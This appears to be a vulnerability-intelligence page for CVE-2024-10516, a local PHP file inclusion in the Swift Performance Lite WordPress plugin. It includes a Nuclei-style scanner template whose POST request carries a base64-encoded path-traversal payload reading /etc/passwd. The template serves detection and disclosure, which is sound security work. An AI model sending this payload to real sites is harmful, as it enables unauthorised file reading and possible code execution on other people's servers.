Vulnerability in Swift Performance Lite < 2.3.7.2 allows local PHP file inclusion and code execution.
Reporter | Title | Published | Views | Family All 5 |
---|---|---|---|---|
Cvelist | CVE-2024-10516 Swift Performance Lite <= 2.3.7.1 - Unauthenticated Local PHP File Inclusion via 'ajaxify' | 6 Dec 202413:45 | – | cvelist |
Vulnrichment | CVE-2024-10516 Swift Performance Lite <= 2.3.7.1 - Unauthenticated Local PHP File Inclusion via 'ajaxify' | 6 Dec 202413:45 | – | vulnrichment |
NVD | CVE-2024-10516 | 6 Dec 202414:15 | – | nvd |
CVE | CVE-2024-10516 | 6 Dec 202414:15 | – | cve |
Wordfence Blog | Wordfence Intelligence Weekly WordPress Vulnerability Report (December 2, 2024 to December 8, 2024) | 12 Dec 202415:38 | – | wordfence |
id: CVE-2024-10516
info:
name: Swift Performance Lite < 2.3.7.2 - Local PHP File Inclusion
author: ritikchaddha
severity: high
description: |
A vulnerability in Swift Performance Lite before version 2.3.7.2 allows unauthenticated attackers to perform local PHP file inclusion via the 'ajaxify' parameter. This can lead to arbitrary code execution on the server.
reference:
- https://github.com/RandomRobbieBF/CVE-2024-10516
- https://nvd.nist.gov/vuln/detail/CVE-2024-10516
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-10516
cwe-id: CWE-98
cpe: cpe:2.3:a:swiftperformance:swift_performance_lite:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: swiftperformance
product: swift_performance_lite
fofa-query: body="/wp-content/plugins/swift-performance-lite"
tags: cve,cve2024,wp,wp-plugin,wordpress,swift-performance,lfi
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/2
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "/wp-content/plugins/swift-performance-lite"
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=swift_performance_ajaxify&data=WyJ0ZW1wbGF0ZS1wYXJ0IiwibnVsbCIsIi4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QiXQ==
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a0046304402206aa70c34a31a4404558a038e638c3e19ba8ec44d07d507196a81710ccfbe790202201c4e4d56ee8a8531dbbe1023342cc5533f469b7dc9162e70b62e95cd045d38a9:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo